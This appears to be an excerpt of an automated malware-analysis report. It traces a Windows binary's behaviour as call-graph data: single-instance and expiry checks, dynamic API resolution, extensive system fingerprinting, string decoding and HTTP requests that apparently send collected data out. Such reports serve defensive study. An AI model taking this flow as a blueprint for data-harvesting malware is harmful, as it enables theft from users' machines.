                                     • OpenEventA (0x956ac2): if the event already exists, CloseHandle + Sleep (0x956af5); otherwise CreateEventA (0x956ae1). Consistent with a single-instance check.
                                     • GetSystemTime (0x956920) → string build (0x956820) → sscanf → SystemTimeToFileTime ×2 (0x9569aa), with one branch to ExitProcess (0x9569d8). Consistent with an expiry-date check.
                                     • GetWindowsDirectoryA (0x957500), GetProcessHeap + RtlAllocateHeap + InternetOpenA (0x944fb0), a second 0x9445c0 run from 0x9426a0, a further block of GetProcAddress calls (0x959c10 … 0x95a6a7), then repeated calls into 0x945960 (34 API calls) via 0x951050, 0x950d90, 0x950f40, 0x951a10 and 0x950740 from 0x955ca3 onward. The dump is truncated at this point in the extract.
lstrcpy 14362->14363 14364 9415d9 14363->14364 14365 95a7a0 lstrcpy 14364->14365 14366 941663 14365->14366 14367 955510 14366->14367 14368 955521 14367->14368 14369 95a820 2 API calls 14368->14369 14370 95552e 14369->14370 14371 95a820 2 API calls 14370->14371 14372 95553b 14371->14372 14373 95a820 2 API calls 14372->14373 14374 955548 14373->14374 14375 95a740 lstrcpy 14374->14375 14376 955555 14375->14376 14377 95a740 lstrcpy 14376->14377 14378 955562 14377->14378 14379 95a740 lstrcpy 14378->14379 14380 95556f 14379->14380 14381 95a740 lstrcpy 14380->14381 14392 95557c 14381->14392 14382 95a740 lstrcpy 14382->14392 14383 955643 StrCmpCA 14383->14392 14384 9556a0 StrCmpCA 14385 9557dc 14384->14385 14384->14392 14386 95a8a0 lstrcpy 14385->14386 14387 9557e8 14386->14387 14388 95a820 2 API calls 14387->14388 14390 9557f6 14388->14390 14389 95a820 lstrlen lstrcpy 14389->14392 14393 95a820 2 API calls 14390->14393 14391 955856 StrCmpCA 14391->14392 14394 955991 14391->14394 14392->14382 14392->14383 14392->14384 14392->14389 14392->14391 14395 95a7a0 lstrcpy 14392->14395 14400 941590 lstrcpy 14392->14400 14403 955a0b StrCmpCA 14392->14403 14404 9552c0 25 API calls 14392->14404 14413 9551f0 20 API calls 14392->14413 14417 95a8a0 lstrcpy 14392->14417 14418 95578a StrCmpCA 14392->14418 14420 95593f StrCmpCA 14392->14420 14397 955805 14393->14397 14396 95a8a0 lstrcpy 14394->14396 14395->14392 14398 95599d 14396->14398 14399 941670 lstrcpy 14397->14399 14401 95a820 2 API calls 14398->14401 14421 955811 14399->14421 14400->14392 14402 9559ab 14401->14402 14405 95a820 2 API calls 14402->14405 14406 955a16 Sleep 14403->14406 14407 955a28 14403->14407 14404->14392 14408 9559ba 14405->14408 14406->14392 14409 95a8a0 lstrcpy 14407->14409 14410 941670 lstrcpy 14408->14410 14411 955a34 14409->14411 14410->14421 14412 95a820 2 API calls 14411->14412 14414 955a43 14412->14414 14413->14392 14415 95a820 2 API calls 14414->14415 14416 955a52 14415->14416 14419 941670 lstrcpy 
14416->14419 14417->14392 14418->14392 14419->14421 14420->14392 14421->13474 14423 957553 GetVolumeInformationA 14422->14423 14424 95754c 14422->14424 14425 957591 14423->14425 14424->14423 14426 9575fc GetProcessHeap RtlAllocateHeap 14425->14426 14427 957619 14426->14427 14428 957628 wsprintfA 14426->14428 14429 95a740 lstrcpy 14427->14429 14430 95a740 lstrcpy 14428->14430 14431 955da7 14429->14431 14430->14431 14431->13495 14433 95a7a0 lstrcpy 14432->14433 14434 944899 14433->14434 15486 9447b0 14434->15486 14436 9448a5 14437 95a740 lstrcpy 14436->14437 14438 9448d7 14437->14438 14439 95a740 lstrcpy 14438->14439 14440 9448e4 14439->14440 14441 95a740 lstrcpy 14440->14441 14442 9448f1 14441->14442 14443 95a740 lstrcpy 14442->14443 14444 9448fe 14443->14444 14445 95a740 lstrcpy 14444->14445 14446 94490b InternetOpenA StrCmpCA 14445->14446 14447 944944 14446->14447 14448 944ecb InternetCloseHandle 14447->14448 15492 958b60 14447->15492 14450 944ee8 14448->14450 15507 949ac0 CryptStringToBinaryA 14450->15507 14451 944963 15500 95a920 14451->15500 14454 944976 14456 95a8a0 lstrcpy 14454->14456 14462 94497f 14456->14462 14457 95a820 2 API calls 14458 944f05 14457->14458 14460 95a9b0 4 API calls 14458->14460 14459 944f27 ctype 14464 95a7a0 lstrcpy 14459->14464 14461 944f1b 14460->14461 14463 95a8a0 lstrcpy 14461->14463 14465 95a9b0 4 API calls 14462->14465 14463->14459 14476 944f57 14464->14476 14466 9449a9 14465->14466 14467 95a8a0 lstrcpy 14466->14467 14468 9449b2 14467->14468 14469 95a9b0 4 API calls 14468->14469 14470 9449d1 14469->14470 14471 95a8a0 lstrcpy 14470->14471 14472 9449da 14471->14472 14473 95a920 3 API calls 14472->14473 14474 9449f8 14473->14474 14475 95a8a0 lstrcpy 14474->14475 14477 944a01 14475->14477 14476->13498 14478 95a9b0 4 API calls 14477->14478 14479 944a20 14478->14479 14480 95a8a0 lstrcpy 14479->14480 14481 944a29 14480->14481 14482 95a9b0 4 API calls 14481->14482 14483 944a48 14482->14483 14484 95a8a0 lstrcpy 14483->14484 14485 944a51 
14484->14485 14486 95a9b0 4 API calls 14485->14486 14487 944a7d 14486->14487 14488 95a920 3 API calls 14487->14488 14489 944a84 14488->14489 14490 95a8a0 lstrcpy 14489->14490 14491 944a8d 14490->14491 14492 944aa3 InternetConnectA 14491->14492 14492->14448 14493 944ad3 HttpOpenRequestA 14492->14493 14495 944ebe InternetCloseHandle 14493->14495 14496 944b28 14493->14496 14495->14448 14497 95a9b0 4 API calls 14496->14497 14498 944b3c 14497->14498 14499 95a8a0 lstrcpy 14498->14499 14500 944b45 14499->14500 14501 95a920 3 API calls 14500->14501 14502 944b63 14501->14502 14503 95a8a0 lstrcpy 14502->14503 14504 944b6c 14503->14504 14505 95a9b0 4 API calls 14504->14505 14506 944b8b 14505->14506 14507 95a8a0 lstrcpy 14506->14507 14508 944b94 14507->14508 14509 95a9b0 4 API calls 14508->14509 14510 944bb5 14509->14510 14511 95a8a0 lstrcpy 14510->14511 14512 944bbe 14511->14512 14513 95a9b0 4 API calls 14512->14513 14514 944bde 14513->14514 14515 95a8a0 lstrcpy 14514->14515 14516 944be7 14515->14516 14517 95a9b0 4 API calls 14516->14517 14518 944c06 14517->14518 14519 95a8a0 lstrcpy 14518->14519 14520 944c0f 14519->14520 14521 95a920 3 API calls 14520->14521 14522 944c2d 14521->14522 14523 95a8a0 lstrcpy 14522->14523 14524 944c36 14523->14524 14525 95a9b0 4 API calls 14524->14525 14526 944c55 14525->14526 14527 95a8a0 lstrcpy 14526->14527 14528 944c5e 14527->14528 14529 95a9b0 4 API calls 14528->14529 14530 944c7d 14529->14530 14531 95a8a0 lstrcpy 14530->14531 14532 944c86 14531->14532 14533 95a920 3 API calls 14532->14533 14534 944ca4 14533->14534 14535 95a8a0 lstrcpy 14534->14535 14536 944cad 14535->14536 14537 95a9b0 4 API calls 14536->14537 14538 944ccc 14537->14538 14539 95a8a0 lstrcpy 14538->14539 14540 944cd5 14539->14540 14541 95a9b0 4 API calls 14540->14541 14542 944cf6 14541->14542 14543 95a8a0 lstrcpy 14542->14543 14544 944cff 14543->14544 14545 95a9b0 4 API calls 14544->14545 14546 944d1f 14545->14546 14547 95a8a0 lstrcpy 14546->14547 14548 944d28 14547->14548 
14549 95a9b0 4 API calls 14548->14549 14550 944d47 14549->14550 14551 95a8a0 lstrcpy 14550->14551 14552 944d50 14551->14552 14553 95a920 3 API calls 14552->14553 14554 944d6e 14553->14554 14555 95a8a0 lstrcpy 14554->14555 14556 944d77 14555->14556 14557 95a740 lstrcpy 14556->14557 14558 944d92 14557->14558 14559 95a920 3 API calls 14558->14559 14560 944db3 14559->14560 14561 95a920 3 API calls 14560->14561 14562 944dba 14561->14562 14563 95a8a0 lstrcpy 14562->14563 14564 944dc6 14563->14564 14565 944de7 lstrlen 14564->14565 14566 944dfa 14565->14566 14567 944e03 lstrlen 14566->14567 15506 95aad0 14567->15506 14569 944e13 HttpSendRequestA 14570 944e32 InternetReadFile 14569->14570 14571 944e67 InternetCloseHandle 14570->14571 14576 944e5e 14570->14576 14573 95a800 14571->14573 14573->14495 14574 95a9b0 4 API calls 14574->14576 14575 95a8a0 lstrcpy 14575->14576 14576->14570 14576->14571 14576->14574 14576->14575 15513 95aad0 14577->15513 14579 9517c4 StrCmpCA 14580 9517cf ExitProcess 14579->14580 14582 9517d7 14579->14582 14581 9519c2 14581->13500 14582->14581 14583 9518f1 StrCmpCA 14582->14583 14584 951951 StrCmpCA 14582->14584 14585 951970 StrCmpCA 14582->14585 14586 951913 StrCmpCA 14582->14586 14587 951932 StrCmpCA 14582->14587 14588 95185d StrCmpCA 14582->14588 14589 95187f StrCmpCA 14582->14589 14590 9518ad StrCmpCA 14582->14590 14591 9518cf StrCmpCA 14582->14591 14592 95a820 lstrlen lstrcpy 14582->14592 14583->14582 14584->14582 14585->14582 14586->14582 14587->14582 14588->14582 14589->14582 14590->14582 14591->14582 14592->14582 14594 95a7a0 lstrcpy 14593->14594 14595 945979 14594->14595 14596 9447b0 2 API calls 14595->14596 14597 945985 14596->14597 14598 95a740 lstrcpy 14597->14598 14599 9459ba 14598->14599 14600 95a740 lstrcpy 14599->14600 14601 9459c7 14600->14601 14602 95a740 lstrcpy 14601->14602 14603 9459d4 14602->14603 14604 95a740 lstrcpy 14603->14604 14605 9459e1 14604->14605 14606 95a740 lstrcpy 14605->14606 14607 9459ee InternetOpenA StrCmpCA 
14606->14607 14608 945a1d 14607->14608 14609 945fc3 InternetCloseHandle 14608->14609 14610 958b60 3 API calls 14608->14610 14611 945fe0 14609->14611 14612 945a3c 14610->14612 14613 949ac0 4 API calls 14611->14613 14614 95a920 3 API calls 14612->14614 14615 945fe6 14613->14615 14616 945a4f 14614->14616 14618 95a820 2 API calls 14615->14618 14621 94601f ctype 14615->14621 14617 95a8a0 lstrcpy 14616->14617 14622 945a58 14617->14622 14619 945ffd 14618->14619 14620 95a9b0 4 API calls 14619->14620 14623 946013 14620->14623 14624 95a7a0 lstrcpy 14621->14624 14626 95a9b0 4 API calls 14622->14626 14625 95a8a0 lstrcpy 14623->14625 14635 94604f 14624->14635 14625->14621 14627 945a82 14626->14627 14628 95a8a0 lstrcpy 14627->14628 14629 945a8b 14628->14629 14630 95a9b0 4 API calls 14629->14630 14631 945aaa 14630->14631 14632 95a8a0 lstrcpy 14631->14632 14633 945ab3 14632->14633 14634 95a920 3 API calls 14633->14634 14636 945ad1 14634->14636 14635->13506 14637 95a8a0 lstrcpy 14636->14637 14638 945ada 14637->14638 14639 95a9b0 4 API calls 14638->14639 14640 945af9 14639->14640 14641 95a8a0 lstrcpy 14640->14641 14642 945b02 14641->14642 14643 95a9b0 4 API calls 14642->14643 14644 945b21 14643->14644 14645 95a8a0 lstrcpy 14644->14645 14646 945b2a 14645->14646 14647 95a9b0 4 API calls 14646->14647 14648 945b56 14647->14648 14649 95a920 3 API calls 14648->14649 14650 945b5d 14649->14650 14651 95a8a0 lstrcpy 14650->14651 14652 945b66 14651->14652 14653 945b7c InternetConnectA 14652->14653 14653->14609 14654 945bac HttpOpenRequestA 14653->14654 14656 945fb6 InternetCloseHandle 14654->14656 14657 945c0b 14654->14657 14656->14609 14658 95a9b0 4 API calls 14657->14658 14659 945c1f 14658->14659 14660 95a8a0 lstrcpy 14659->14660 14661 945c28 14660->14661 14662 95a920 3 API calls 14661->14662 14663 945c46 14662->14663 14664 95a8a0 lstrcpy 14663->14664 14665 945c4f 14664->14665 14666 95a9b0 4 API calls 14665->14666 14667 945c6e 14666->14667 14668 95a8a0 lstrcpy 14667->14668 14669 945c77 
14668->14669 14670 95a9b0 4 API calls 14669->14670 14671 945c98 14670->14671 14672 95a8a0 lstrcpy 14671->14672 14673 945ca1 14672->14673 14674 95a9b0 4 API calls 14673->14674 14675 945cc1 14674->14675 14676 95a8a0 lstrcpy 14675->14676 14677 945cca 14676->14677 14678 95a9b0 4 API calls 14677->14678 14679 945ce9 14678->14679 14680 95a8a0 lstrcpy 14679->14680 14681 945cf2 14680->14681 14682 95a920 3 API calls 14681->14682 14683 945d10 14682->14683 14684 95a8a0 lstrcpy 14683->14684 14685 945d19 14684->14685 14686 95a9b0 4 API calls 14685->14686 14687 945d38 14686->14687 14688 95a8a0 lstrcpy 14687->14688 14689 945d41 14688->14689 14690 95a9b0 4 API calls 14689->14690 14691 945d60 14690->14691 14692 95a8a0 lstrcpy 14691->14692 14693 945d69 14692->14693 14694 95a920 3 API calls 14693->14694 14695 945d87 14694->14695 14696 95a8a0 lstrcpy 14695->14696 14697 945d90 14696->14697 14698 95a9b0 4 API calls 14697->14698 14699 945daf 14698->14699 14700 95a8a0 lstrcpy 14699->14700 14701 945db8 14700->14701 14702 95a9b0 4 API calls 14701->14702 14703 945dd9 14702->14703 14704 95a8a0 lstrcpy 14703->14704 14705 945de2 14704->14705 14706 95a9b0 4 API calls 14705->14706 14707 945e02 14706->14707 14708 95a8a0 lstrcpy 14707->14708 14709 945e0b 14708->14709 14710 95a9b0 4 API calls 14709->14710 14711 945e2a 14710->14711 14712 95a8a0 lstrcpy 14711->14712 14713 945e33 14712->14713 14714 95a920 3 API calls 14713->14714 14715 945e54 14714->14715 14716 95a8a0 lstrcpy 14715->14716 14717 945e5d 14716->14717 14718 945e70 lstrlen 14717->14718 15514 95aad0 14718->15514 14720 945e81 lstrlen GetProcessHeap RtlAllocateHeap 15515 95aad0 14720->15515 14722 945eae lstrlen 14723 945ebe 14722->14723 14724 945ed7 lstrlen 14723->14724 14725 945ee7 14724->14725 14726 945ef0 lstrlen 14725->14726 14727 945f04 14726->14727 14728 945f1a lstrlen 14727->14728 15516 95aad0 14728->15516 14730 945f2a HttpSendRequestA 14731 945f35 InternetReadFile 14730->14731 14732 945f6a InternetCloseHandle 14731->14732 14736 945f61 
14731->14736 14732->14656 14734 95a9b0 4 API calls 14734->14736 14735 95a8a0 lstrcpy 14735->14736 14736->14731 14736->14732 14736->14734 14736->14735 14738 951077 14737->14738 14739 951151 14738->14739 14740 95a820 lstrlen lstrcpy 14738->14740 14739->13508 14740->14738 14746 950db7 14741->14746 14742 950f17 14742->13516 14743 950ea4 StrCmpCA 14743->14746 14744 950e27 StrCmpCA 14744->14746 14745 950e67 StrCmpCA 14745->14746 14746->14742 14746->14743 14746->14744 14746->14745 14747 95a820 lstrlen lstrcpy 14746->14747 14747->14746 14751 950f67 14748->14751 14749 951044 14749->13524 14750 950fb2 StrCmpCA 14750->14751 14751->14749 14751->14750 14752 95a820 lstrlen lstrcpy 14751->14752 14752->14751 14754 95a740 lstrcpy 14753->14754 14755 951a26 14754->14755 14756 95a9b0 4 API calls 14755->14756 14757 951a37 14756->14757 14758 95a8a0 lstrcpy 14757->14758 14759 951a40 14758->14759 14760 95a9b0 4 API calls 14759->14760 14761 951a5b 14760->14761 14762 95a8a0 lstrcpy 14761->14762 14763 951a64 14762->14763 14764 95a9b0 4 API calls 14763->14764 14765 951a7d 14764->14765 14766 95a8a0 lstrcpy 14765->14766 14767 951a86 14766->14767 14768 95a9b0 4 API calls 14767->14768 14769 951aa1 14768->14769 14770 95a8a0 lstrcpy 14769->14770 14771 951aaa 14770->14771 14772 95a9b0 4 API calls 14771->14772 14773 951ac3 14772->14773 14774 95a8a0 lstrcpy 14773->14774 14775 951acc 14774->14775 14776 95a9b0 4 API calls 14775->14776 14777 951ae7 14776->14777 14778 95a8a0 lstrcpy 14777->14778 14779 951af0 14778->14779 14780 95a9b0 4 API calls 14779->14780 14781 951b09 14780->14781 14782 95a8a0 lstrcpy 14781->14782 14783 951b12 14782->14783 14784 95a9b0 4 API calls 14783->14784 14785 951b2d 14784->14785 14786 95a8a0 lstrcpy 14785->14786 14787 951b36 14786->14787 14788 95a9b0 4 API calls 14787->14788 14789 951b4f 14788->14789 14790 95a8a0 lstrcpy 14789->14790 14791 951b58 14790->14791 14792 95a9b0 4 API calls 14791->14792 14793 951b76 14792->14793 14794 95a8a0 lstrcpy 14793->14794 14795 951b7f 
14794->14795 14796 957500 6 API calls 14795->14796 14797 951b96 14796->14797 14798 95a920 3 API calls 14797->14798 14799 951ba9 14798->14799 14800 95a8a0 lstrcpy 14799->14800 14801 951bb2 14800->14801 14802 95a9b0 4 API calls 14801->14802 14803 951bdc 14802->14803 14804 95a8a0 lstrcpy 14803->14804 14805 951be5 14804->14805 14806 95a9b0 4 API calls 14805->14806 14807 951c05 14806->14807 14808 95a8a0 lstrcpy 14807->14808 14809 951c0e 14808->14809 15517 957690 GetProcessHeap RtlAllocateHeap 14809->15517 14812 95a9b0 4 API calls 14813 951c2e 14812->14813 14814 95a8a0 lstrcpy 14813->14814 14815 951c37 14814->14815 14816 95a9b0 4 API calls 14815->14816 14817 951c56 14816->14817 14818 95a8a0 lstrcpy 14817->14818 14819 951c5f 14818->14819 14820 95a9b0 4 API calls 14819->14820 14821 951c80 14820->14821 14822 95a8a0 lstrcpy 14821->14822 14823 951c89 14822->14823 15524 9577c0 GetCurrentProcess IsWow64Process 14823->15524 14826 95a9b0 4 API calls 14827 951ca9 14826->14827 14828 95a8a0 lstrcpy 14827->14828 14829 951cb2 14828->14829 14830 95a9b0 4 API calls 14829->14830 14831 951cd1 14830->14831 14832 95a8a0 lstrcpy 14831->14832 14833 951cda 14832->14833 14834 95a9b0 4 API calls 14833->14834 14835 951cfb 14834->14835 14836 95a8a0 lstrcpy 14835->14836 14837 951d04 14836->14837 14838 957850 3 API calls 14837->14838 14839 951d14 14838->14839 14840 95a9b0 4 API calls 14839->14840 14841 951d24 14840->14841 14842 95a8a0 lstrcpy 14841->14842 14843 951d2d 14842->14843 14844 95a9b0 4 API calls 14843->14844 14845 951d4c 14844->14845 14846 95a8a0 lstrcpy 14845->14846 14847 951d55 14846->14847 14848 95a9b0 4 API calls 14847->14848 14849 951d75 14848->14849 14850 95a8a0 lstrcpy 14849->14850 14851 951d7e 14850->14851 14852 9578e0 3 API calls 14851->14852 14853 951d8e 14852->14853 14854 95a9b0 4 API calls 14853->14854 14855 951d9e 14854->14855 14856 95a8a0 lstrcpy 14855->14856 14857 951da7 14856->14857 14858 95a9b0 4 API calls 14857->14858 14859 951dc6 14858->14859 14860 95a8a0 lstrcpy 
14859->14860 14861 951dcf 14860->14861 14862 95a9b0 4 API calls 14861->14862 14863 951df0 14862->14863 14864 95a8a0 lstrcpy 14863->14864 14865 951df9 14864->14865 15526 957980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14865->15526 14868 95a9b0 4 API calls 14869 951e19 14868->14869 14870 95a8a0 lstrcpy 14869->14870 14871 951e22 14870->14871 14872 95a9b0 4 API calls 14871->14872 14873 951e41 14872->14873 14874 95a8a0 lstrcpy 14873->14874 14875 951e4a 14874->14875 14876 95a9b0 4 API calls 14875->14876 14877 951e6b 14876->14877 14878 95a8a0 lstrcpy 14877->14878 14879 951e74 14878->14879 15528 957a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14879->15528 14882 95a9b0 4 API calls 14883 951e94 14882->14883 14884 95a8a0 lstrcpy 14883->14884 14885 951e9d 14884->14885 14886 95a9b0 4 API calls 14885->14886 14887 951ebc 14886->14887 14888 95a8a0 lstrcpy 14887->14888 14889 951ec5 14888->14889 14890 95a9b0 4 API calls 14889->14890 14891 951ee5 14890->14891 14892 95a8a0 lstrcpy 14891->14892 14893 951eee 14892->14893 15531 957b00 GetUserDefaultLocaleName 14893->15531 14896 95a9b0 4 API calls 14897 951f0e 14896->14897 14898 95a8a0 lstrcpy 14897->14898 14899 951f17 14898->14899 14900 95a9b0 4 API calls 14899->14900 14901 951f36 14900->14901 14902 95a8a0 lstrcpy 14901->14902 14903 951f3f 14902->14903 14904 95a9b0 4 API calls 14903->14904 14905 951f60 14904->14905 14906 95a8a0 lstrcpy 14905->14906 14907 951f69 14906->14907 15535 957b90 14907->15535 14909 951f80 14910 95a920 3 API calls 14909->14910 14911 951f93 14910->14911 14912 95a8a0 lstrcpy 14911->14912 14913 951f9c 14912->14913 14914 95a9b0 4 API calls 14913->14914 14915 951fc6 14914->14915 14916 95a8a0 lstrcpy 14915->14916 14917 951fcf 14916->14917 14918 95a9b0 4 API calls 14917->14918 14919 951fef 14918->14919 14920 95a8a0 lstrcpy 14919->14920 14921 951ff8 14920->14921 15547 957d80 GetSystemPowerStatus 14921->15547 14924 95a9b0 4 API calls 14925 952018 14924->14925 14926 95a8a0 lstrcpy 14925->14926 14927 
952021 14926->14927 14928 95a9b0 4 API calls 14927->14928 14929 952040 14928->14929 14930 95a8a0 lstrcpy 14929->14930 14931 952049 14930->14931 14932 95a9b0 4 API calls 14931->14932 14933 95206a 14932->14933 14934 95a8a0 lstrcpy 14933->14934 14935 952073 14934->14935 14936 95207e GetCurrentProcessId 14935->14936 15549 959470 OpenProcess 14936->15549 14939 95a920 3 API calls 14940 9520a4 14939->14940 14941 95a8a0 lstrcpy 14940->14941 14942 9520ad 14941->14942 14943 95a9b0 4 API calls 14942->14943 14944 9520d7 14943->14944 14945 95a8a0 lstrcpy 14944->14945 14946 9520e0 14945->14946 14947 95a9b0 4 API calls 14946->14947 14948 952100 14947->14948 14949 95a8a0 lstrcpy 14948->14949 14950 952109 14949->14950 15554 957e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14950->15554 14953 95a9b0 4 API calls 14954 952129 14953->14954 14955 95a8a0 lstrcpy 14954->14955 14956 952132 14955->14956 14957 95a9b0 4 API calls 14956->14957 14958 952151 14957->14958 14959 95a8a0 lstrcpy 14958->14959 14960 95215a 14959->14960 14961 95a9b0 4 API calls 14960->14961 14962 95217b 14961->14962 14963 95a8a0 lstrcpy 14962->14963 14964 952184 14963->14964 15558 957f60 14964->15558 14967 95a9b0 4 API calls 14968 9521a4 14967->14968 14969 95a8a0 lstrcpy 14968->14969 14970 9521ad 14969->14970 14971 95a9b0 4 API calls 14970->14971 14972 9521cc 14971->14972 14973 95a8a0 lstrcpy 14972->14973 14974 9521d5 14973->14974 14975 95a9b0 4 API calls 14974->14975 14976 9521f6 14975->14976 14977 95a8a0 lstrcpy 14976->14977 14978 9521ff 14977->14978 15571 957ed0 GetSystemInfo wsprintfA 14978->15571 14981 95a9b0 4 API calls 14982 95221f 14981->14982 14983 95a8a0 lstrcpy 14982->14983 14984 952228 14983->14984 14985 95a9b0 4 API calls 14984->14985 14986 952247 14985->14986 14987 95a8a0 lstrcpy 14986->14987 14988 952250 14987->14988 14989 95a9b0 4 API calls 14988->14989 14990 952270 14989->14990 14991 95a8a0 lstrcpy 14990->14991 14992 952279 14991->14992 15573 958100 GetProcessHeap RtlAllocateHeap 14992->15573 14995 
95a9b0 4 API calls 14996 952299 14995->14996 14997 95a8a0 lstrcpy 14996->14997 14998 9522a2 14997->14998 14999 95a9b0 4 API calls 14998->14999 15000 9522c1 14999->15000 15001 95a8a0 lstrcpy 15000->15001 15002 9522ca 15001->15002 15003 95a9b0 4 API calls 15002->15003 15004 9522eb 15003->15004 15005 95a8a0 lstrcpy 15004->15005 15006 9522f4 15005->15006 15579 9587c0 15006->15579 15009 95a920 3 API calls 15010 95231e 15009->15010 15011 95a8a0 lstrcpy 15010->15011 15012 952327 15011->15012 15013 95a9b0 4 API calls 15012->15013 15014 952351 15013->15014 15015 95a8a0 lstrcpy 15014->15015 15016 95235a 15015->15016 15017 95a9b0 4 API calls 15016->15017 15018 95237a 15017->15018 15019 95a8a0 lstrcpy 15018->15019 15020 952383 15019->15020 15021 95a9b0 4 API calls 15020->15021 15022 9523a2 15021->15022 15023 95a8a0 lstrcpy 15022->15023 15024 9523ab 15023->15024 15584 9581f0 15024->15584 15026 9523c2 15027 95a920 3 API calls 15026->15027 15028 9523d5 15027->15028 15029 95a8a0 lstrcpy 15028->15029 15030 9523de 15029->15030 15031 95a9b0 4 API calls 15030->15031 15032 95240a 15031->15032 15033 95a8a0 lstrcpy 15032->15033 15034 952413 15033->15034 15035 95a9b0 4 API calls 15034->15035 15036 952432 15035->15036 15037 95a8a0 lstrcpy 15036->15037 15038 95243b 15037->15038 15039 95a9b0 4 API calls 15038->15039 15040 95245c 15039->15040 15041 95a8a0 lstrcpy 15040->15041 15042 952465 15041->15042 15043 95a9b0 4 API calls 15042->15043 15044 952484 15043->15044 15045 95a8a0 lstrcpy 15044->15045 15046 95248d 15045->15046 15047 95a9b0 4 API calls 15046->15047 15048 9524ae 15047->15048 15049 95a8a0 lstrcpy 15048->15049 15050 9524b7 15049->15050 15592 958320 15050->15592 15052 9524d3 15053 95a920 3 API calls 15052->15053 15054 9524e6 15053->15054 15055 95a8a0 lstrcpy 15054->15055 15056 9524ef 15055->15056 15057 95a9b0 4 API calls 15056->15057 15058 952519 15057->15058 15059 95a8a0 lstrcpy 15058->15059 15060 952522 15059->15060 15061 95a9b0 4 API calls 15060->15061 15062 952543 15061->15062 
15063 95a8a0 lstrcpy 15062->15063 15064 95254c 15063->15064 15065 958320 17 API calls 15064->15065 15066 952568 15065->15066 15067 95a920 3 API calls 15066->15067 15068 95257b 15067->15068 15069 95a8a0 lstrcpy 15068->15069 15070 952584 15069->15070 15071 95a9b0 4 API calls 15070->15071 15072 9525ae 15071->15072 15073 95a8a0 lstrcpy 15072->15073 15074 9525b7 15073->15074 15075 95a9b0 4 API calls 15074->15075 15076 9525d6 15075->15076 15077 95a8a0 lstrcpy 15076->15077 15078 9525df 15077->15078 15079 95a9b0 4 API calls 15078->15079 15080 952600 15079->15080 15081 95a8a0 lstrcpy 15080->15081 15082 952609 15081->15082 15628 958680 15082->15628 15084 952620 15085 95a920 3 API calls 15084->15085 15086 952633 15085->15086 15087 95a8a0 lstrcpy 15086->15087 15088 95263c 15087->15088 15089 95265a lstrlen 15088->15089 15090 95266a 15089->15090 15091 95a740 lstrcpy 15090->15091 15092 95267c 15091->15092 15093 941590 lstrcpy 15092->15093 15094 95268d 15093->15094 15638 955190 15094->15638 15096 952699 15096->13528 15826 95aad0 15097->15826 15099 945009 InternetOpenUrlA 15100 945021 15099->15100 15101 9450a0 InternetCloseHandle InternetCloseHandle 15100->15101 15102 94502a InternetReadFile 15100->15102 15103 9450ec 15101->15103 15102->15100 15103->13532 15827 9498d0 15104->15827 15106 950759 15107 95077d 15106->15107 15108 950a38 15106->15108 15111 950799 StrCmpCA 15107->15111 15109 941590 lstrcpy 15108->15109 15110 950a49 15109->15110 16003 950250 15110->16003 15113 950843 15111->15113 15114 9507a8 15111->15114 15117 950865 StrCmpCA 15113->15117 15116 95a7a0 lstrcpy 15114->15116 15118 9507c3 15116->15118 15119 950874 15117->15119 15156 95096b 15117->15156 15120 941590 lstrcpy 15118->15120 15121 95a740 lstrcpy 15119->15121 15122 95080c 15120->15122 15124 950881 15121->15124 15125 95a7a0 lstrcpy 15122->15125 15123 95099c StrCmpCA 15126 950a2d 15123->15126 15127 9509ab 15123->15127 15128 95a9b0 4 API calls 15124->15128 15129 950823 15125->15129 15126->13536 15130 941590 lstrcpy 
15127->15130 15131 9508ac 15128->15131 15132 95a7a0 lstrcpy 15129->15132 15133 9509f4 15130->15133 15134 95a920 3 API calls 15131->15134 15135 95083e 15132->15135 15136 95a7a0 lstrcpy 15133->15136 15137 9508b3 15134->15137 15830 94fb00 15135->15830 15139 950a0d 15136->15139 15140 95a9b0 4 API calls 15137->15140 15141 95a7a0 lstrcpy 15139->15141 15142 9508ba 15140->15142 15143 950a28 15141->15143 15144 95a8a0 lstrcpy 15142->15144 15946 950030 15143->15946 15156->15123 15478 95a7a0 lstrcpy 15477->15478 15479 941683 15478->15479 15480 95a7a0 lstrcpy 15479->15480 15481 941695 15480->15481 15482 95a7a0 lstrcpy 15481->15482 15483 9416a7 15482->15483 15484 95a7a0 lstrcpy 15483->15484 15485 9415a3 15484->15485 15485->14359 15487 9447c6 15486->15487 15488 944838 lstrlen 15487->15488 15512 95aad0 15488->15512 15490 944848 InternetCrackUrlA 15491 944867 15490->15491 15491->14436 15493 95a740 lstrcpy 15492->15493 15494 958b74 15493->15494 15495 95a740 lstrcpy 15494->15495 15496 958b82 GetSystemTime 15495->15496 15497 958b99 15496->15497 15498 95a7a0 lstrcpy 15497->15498 15499 958bfc 15498->15499 15499->14451 15501 95a931 15500->15501 15502 95a988 15501->15502 15504 95a968 lstrcpy lstrcat 15501->15504 15503 95a7a0 lstrcpy 15502->15503 15505 95a994 15503->15505 15504->15502 15505->14454 15506->14569 15508 949af9 LocalAlloc 15507->15508 15509 944eee 15507->15509 15508->15509 15510 949b14 CryptStringToBinaryA 15508->15510 15509->14457 15509->14459 15510->15509 15511 949b39 LocalFree 15510->15511 15511->15509 15512->15490 15513->14579 15514->14720 15515->14722 15516->14730 15645 9577a0 15517->15645 15520 9576c6 RegOpenKeyExA 15522 957704 RegCloseKey 15520->15522 15523 9576e7 RegQueryValueExA 15520->15523 15521 951c1e 15521->14812 15522->15521 15523->15522 15525 951c99 15524->15525 15525->14826 15527 951e09 15526->15527 15527->14868 15529 951e84 15528->15529 15530 957a9a wsprintfA 15528->15530 15529->14882 15530->15529 15532 951efe 15531->15532 15533 957b4d 15531->15533 15532->14896 

                                    Control-flow Graph
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,015E0588), ref: 009598A1
                                    • GetProcAddress.KERNEL32(75900000,015E0738), ref: 009598BA
                                    • GetProcAddress.KERNEL32(75900000,015E0750), ref: 009598D2
                                    • GetProcAddress.KERNEL32(75900000,015E07B0), ref: 009598EA
                                    • GetProcAddress.KERNEL32(75900000,015E0768), ref: 00959903
                                    • GetProcAddress.KERNEL32(75900000,015E8840), ref: 0095991B
                                    • GetProcAddress.KERNEL32(75900000,015D6400), ref: 00959933
                                    • GetProcAddress.KERNEL32(75900000,015D6480), ref: 0095994C
                                    • GetProcAddress.KERNEL32(75900000,015E07C8), ref: 00959964
                                    • GetProcAddress.KERNEL32(75900000,015E07E0), ref: 0095997C
